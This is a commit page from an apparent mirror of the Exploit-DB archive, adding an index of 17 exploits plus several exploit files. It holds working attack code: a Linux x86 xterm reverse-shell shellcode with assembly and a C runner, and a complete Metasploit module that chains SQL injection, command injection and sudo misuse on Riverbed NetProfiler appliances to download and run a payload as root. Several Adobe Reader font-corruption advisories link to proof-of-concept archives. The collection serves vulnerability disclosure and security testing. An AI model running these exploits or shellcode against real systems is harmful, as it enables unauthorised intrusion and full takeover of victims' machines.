bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-07-14

Browse source 
17 new exploits

Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)
Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption
Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption
Adobe Flash Player 22.0.0.192 - TAG Memory Corruption
Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption

Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode
GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials
MS16-032 Secondary Logon Handle Privilege Escalation
Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution
Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities
Linux x86 Reverse Shell using Xterm  ///usr/bin/xterm -display 127.1.1.1:10
This commit is contained in:
Offensive Security 2016-07-14 05:05:01 +00:00
parent 5cf8f533ae
commit 13e9ec719b
19 changed files with 1837 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -11736,6 +11736,7 @@ id,file,description,date,author,platform,type,port
40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption",2016-07-13,COSIG,multiple,dos,0
30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
@ -30539,6 +30540,9 @@ id,file,description,date,author,platform,type,port
33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0 33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0 33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0
33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0
40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0
40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0
33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0
@ -31574,6 +31578,11 @@ id,file,description,date,author,platform,type,port
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0
35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0
40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0
40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0
40102,platforms/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,multiple,dos,0
40103,platforms/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,multiple,dos,0
35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090
35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
@ -35271,6 +35280,8 @@ id,file,description,date,author,platform,type,port
39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0
40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0
39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0 39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0 39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
@ -35919,6 +35930,7 @@ id,file,description,date,author,platform,type,port
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
40094,platforms/win32/shellcode/40094.c,"Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode",2016-07-13,"Roziul Hasan Khan Shifat",win32,shellcode,0
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
@ -36256,3 +36268,8 @@ id,file,description,date,author,platform,type,port
40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40107,platforms/windows/local/40107.rb,"MS16-032 Secondary Logon Handle Privilege Escalation",2016-07-13,metasploit,windows,local,0
40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,metasploit,linux,remote,443
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux x86 Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10",2016-07-13,RTV,lin_x86,shellcode,0

Can't render this file because it is too large.

78
platforms/lin_x86/shellcode/40110.c Executable file
View file

@ -0,0 +1,78 @@
/*
# Title : Linux , Reverse Shell using Xterm , ///usr/bin/xterm -display 127.1.1.1:10
# Date : 12-07-2016
# Author : RTV
# Tested On : Ubuntu x86
# shellcode : \x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80
*/
/*
;**********************************
;xterm.asm
;xterm reverse shell , 32 bit Linux
;nasm -f elf32 -o xterm.o xterm.asm && ld -o xtermrev xterm.o
;Shellcode length 68
section .text
global _start
_start:
xor eax,eax
xor edx,edx
push eax
push 0x30313a31 ; setting the listening IP and display , used 127.1.1.1:10 , change this section to set your IP
push 0x2e312e31
push 0x2e373231
mov esi,esp
push eax
push 0x79616c70 ; -display
push 0x7369642d
mov edi,esp
push eax
push 0x6d726574 ; ///usr/bin/xterm
push 0x782f6e69
push 0x622f7273
push 0x752f2f2f
mov ebx,esp
push eax
push esi
push edi
push ebx
mov ecx,esp
mov al,11
int 0x80
;**********************************
/** shellcode.c , gcc -fno-stack-protector -z execstack -o xtermrev shellcode.c
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
/***************************
Notes : -
Xterm reverse shell
Use these commands to listen at your side
Xnest :10 ( starting Xserver with display 10)
xhost +targetip ( authorize the target ip to connect back)
# SLAE - 739
*/

318
platforms/linux/remote/40108.rb Executable file
View file

@ -0,0 +1,318 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
require 'digest'
def initialize(info={})
super(update_info(info,
'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
'Description' => %q{
This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
can be exploited to add a malicious user into the application's database. An attacker can then exploit a
command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
configuration of the sudoers file can be abused to escalate privileges to root.
},
'License' => MSF_LICENSE,
'Author' => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'Privileged' => false,
'DisclosureDate' => "Jun 27 2016",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}";
# Verifies existence of login SQLi
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_check
})
if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Attempting log in to target appliance")
@sessid = do_login
print_status("Confirming command injection vulnerability")
test_cmd_inject
vprint_status('Ready to execute payload on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def get_nonce
# Function to get nonce from login page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php'),
})
if res && res.body && res.body.include?('nonce_')
html = res.get_html_document
nonce_field = html.at('input[@name="nonce"]')
nonce = nonce_field.attributes["value"]
else
fail_with(Failure::Unknown, 'Unable to get login nonce.')
end
# needed as login nonce is bounded to preauth SESSID cookie
sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
return [nonce, sessid_cookie_preauth]
end
def do_login
uname = datastore['RIVERBED_USER']
passwd = datastore['RIVERBED_PASSWORD']
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
# Exploit login SQLi if credentials are not valid.
if res && res.body && res.body.include?('<form name="login"')
print_status("Invalid credentials. Creating malicious user through login SQLi")
create_user
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
else
print_status("Valid login credentials provided. Successfully logged in")
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
end
return sessid_cookie
end
def report_cred(username, password)
# Function used to save login credentials into Metasploit database
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def create_user
# Function exploiting login SQLi to create a malicious user
username = datastore['RIVERBED_USER']
password = datastore['RIVERBED_PASSWORD']
usr_payload = generate_sqli_payload(username)
pwd_hash = Digest::SHA512.hexdigest(password)
pass_payload = generate_sqli_payload(pwd_hash)
uid = rand(999)
json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_sqli
})
json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_checkuser
})
if res && res.body && res.body.include?('session_id')
print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
end
def generate_sqli_payload(input)
# Function to generate sqli payload for user/pass in expected format
payload = ''
input_array = input.strip.split('')
for index in 0..input_array.length-1
payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||'
end
# Gets rid of the trailing '||' and newline
payload = payload[0..-3]
return payload
end
def test_cmd_inject
post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
unless res && res.body.include?('uid=')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
end
def cmd_inject(cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => cmd
})
end
# Deliver payload to appliance and make it run it
def primer
# Gets the autogenerated uri
payload_uri = get_uri
root_ssh_key_private = rand_text_alpha_lower(8)
binary_payload = rand_text_alpha_lower(8)
print_status("Privilege escalate to root and execute payload")
privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"
cmd_inject(privesc_exec_cmd)
register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
register_file_for_cleanup("/tmp/#{binary_payload}")
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end

56
platforms/multiple/dos/40095.txt Executable file
View file

@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4205
# COSIG-2016-30
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40095.zip
####################################################################################

56
platforms/multiple/dos/40096.txt Executable file
View file

@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4204
# COSIG-2016-29
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40096.zip
####################################################################################

56
platforms/multiple/dos/40097.txt Executable file
View file

@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4203
# COSIG-2016-28
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
